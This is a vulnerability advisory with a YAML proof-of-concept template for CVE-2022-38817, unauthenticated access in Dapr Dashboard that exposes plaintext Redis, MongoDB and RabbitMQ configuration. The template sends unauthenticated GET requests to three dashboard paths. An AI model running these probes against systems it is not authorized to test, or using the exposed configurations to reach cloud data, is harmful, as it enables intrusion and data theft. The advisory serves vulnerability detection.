漏洞描述
Dapr Dashboard v0.1.0 through v0.10.0 is vulnerable to Incorrect Access Control that allows attackers to obtain sensitive data.
Dapr Dashboard 存在 未授权访问漏洞,在未经授权的情况下获取云上redis、mongodb、rabbitmq等应用的明文配置信息,并可以进一步利用这些配置信息获取云上的敏感数据
"Dapr Dashboard"
CVE-2022-38817: Dapr Dashboard configurations 未授权访问漏洞
PoC代码[已公开]
id: CVE-2022-38817
info:
name: Dapr Dashboard configurations 未授权访问漏洞
author: For3stCo1d
severity: high
description: |
Dapr Dashboard v0.1.0 through v0.10.0 is vulnerable to Incorrect Access Control that allows attackers to obtain sensitive data.
Dapr Dashboard 存在 未授权访问漏洞,在未经授权的情况下获取云上redis、mongodb、rabbitmq等应用的明文配置信息,并可以进一步利用这些配置信息获取云上的敏感数据
"Dapr Dashboard"
reference:
- https://github.com/dapr/dashboard/issues/222
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817
- https://github.com/dapr/dashboard
- http://wiki.peiqi.tech/wiki/webapp/Dapr/Dapr%20Dashboard%20configurations%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2022-38817.html
rules:
r0:
request:
method: GET
path: /components/statestore
expression: response.status == 200 && response.body.bcontains(b'<title>Dapr Dashboard</title>')
r1:
request:
method: GET
path: /overview
expression: response.status == 200 && response.body.bcontains(b'<title>Dapr Dashboard</title>')
r2:
request:
method: GET
path: /controlplane
expression: response.status == 200 && response.body.bcontains(b'<title>Dapr Dashboard</title>')
expression: r0() || r1() || r2()